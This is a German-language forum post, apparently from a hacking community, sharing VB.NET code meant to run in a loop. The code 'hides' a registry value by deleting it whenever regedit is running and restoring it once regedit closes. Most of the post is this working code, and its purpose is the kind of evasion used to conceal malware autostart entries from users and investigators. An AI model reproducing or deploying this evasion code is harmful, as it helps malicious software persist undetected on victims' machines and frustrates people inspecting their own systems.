Ich hab mich mal ran gesetzt und mir eine Möglichkeit überlegt, wie man einen Registry Key "verstecken" kann. Aufzurufen ist das ganze in einem Thread oder Timer.
Für alle "Flamer": Dieser Code ist 2007 entstanden und nicht ich habe ihn von dem Typ auf HackForums kopiert sondern anders rum..
Funktionsweise:
Überprüft ob der Prozess "regedit" läuft (jaja ich weiß kann man schöner machen)
Wenn ja, löscht er den Key der den übergebenen Parametern entspricht, wenn nicht dann wird der Key erstellt.
Code:
Public Enum HKEY
ClassesRoot
CurrentUser
LocalMachine
Users
CurrentConfig
End Enum
Public Shared Sub HideValueFromRegistry(ByVal HKEY As HKEY, ByVal SubKey As String, ByVal Name As String, ByVal KeyValue As String)
Dim List As New List(Of String)
For Each Proc As Process In Process.GetProcesses
List.Add(Proc.ProcessName)
Next
If List.Contains("regedit") Then
Select Case HKEY
Case HKEY.ClassesRoot
Dim Key As RegistryKey = Registry.ClassesRoot.OpenSubKey(SubKey)
If Key.GetValue(Name) IsNot Nothing Then
My.Computer.Registry.ClassesRoot.OpenSubKey(SubKey, True).DeleteValue(Name)
End If
Case HKEY.CurrentUser
Dim Key As RegistryKey = Registry.CurrentUser.OpenSubKey(SubKey)
If Key.GetValue(Name) IsNot Nothing Then
My.Computer.Registry.CurrentUser.OpenSubKey(SubKey, True).DeleteValue(Name)
End If
Case HKEY.LocalMachine
Dim Key As RegistryKey = Registry.LocalMachine.OpenSubKey(SubKey)
If Key.GetValue(Name) IsNot Nothing Then
My.Computer.Registry.LocalMachine.OpenSubKey(SubKey, True).DeleteValue(Name)
End If
Case HKEY.Users
Dim Key As RegistryKey = Registry.Users.OpenSubKey(SubKey)
If Key.GetValue(Name) IsNot Nothing Then
My.Computer.Registry.Users.OpenSubKey(SubKey, True).DeleteValue(Name)
End If
Case HKEY.CurrentConfig
Dim Key As RegistryKey = Registry.CurrentConfig.OpenSubKey(SubKey)
If Key.GetValue(Name) IsNot Nothing Then
My.Computer.Registry.CurrentConfig.OpenSubKey(SubKey, True).DeleteValue(Name)
End If
End Select
Else
Select Case HKEY
Case HKEY.ClassesRoot
Dim Key As RegistryKey = Registry.ClassesRoot.OpenSubKey(SubKey)
If Key.GetValue(Name) Is Nothing Then
My.Computer.Registry.ClassesRoot.OpenSubKey(SubKey, True).SetValue(Name, KeyValue)
End If
Case HKEY.CurrentUser
Dim Key As RegistryKey = Registry.CurrentUser.OpenSubKey(SubKey)
If Key.GetValue(Name) Is Nothing Then
My.Computer.Registry.CurrentUser.OpenSubKey(SubKey, True).SetValue(Name, KeyValue)
End If
Case HKEY.LocalMachine
Dim Key As RegistryKey = Registry.LocalMachine.OpenSubKey(SubKey)
If Key.GetValue(Name) Is Nothing Then
My.Computer.Registry.LocalMachine.OpenSubKey(SubKey, True).SetValue(Name, KeyValue)
End If
Case HKEY.Users
Dim Key As RegistryKey = Registry.Users.OpenSubKey(SubKey)
If Key.GetValue(Name) Is Nothing Then
My.Computer.Registry.Users.OpenSubKey(SubKey, True).SetValue(Name, KeyValue)
End If
Case HKEY.CurrentConfig
Dim Key As RegistryKey = Registry.CurrentConfig.OpenSubKey(SubKey)
If Key.GetValue(Name) Is Nothing Then
My.Computer.Registry.CurrentConfig.OpenSubKey(SubKey, True).SetValue(Name, KeyValue)
End If
End Select
End If
End Sub
mfg
nom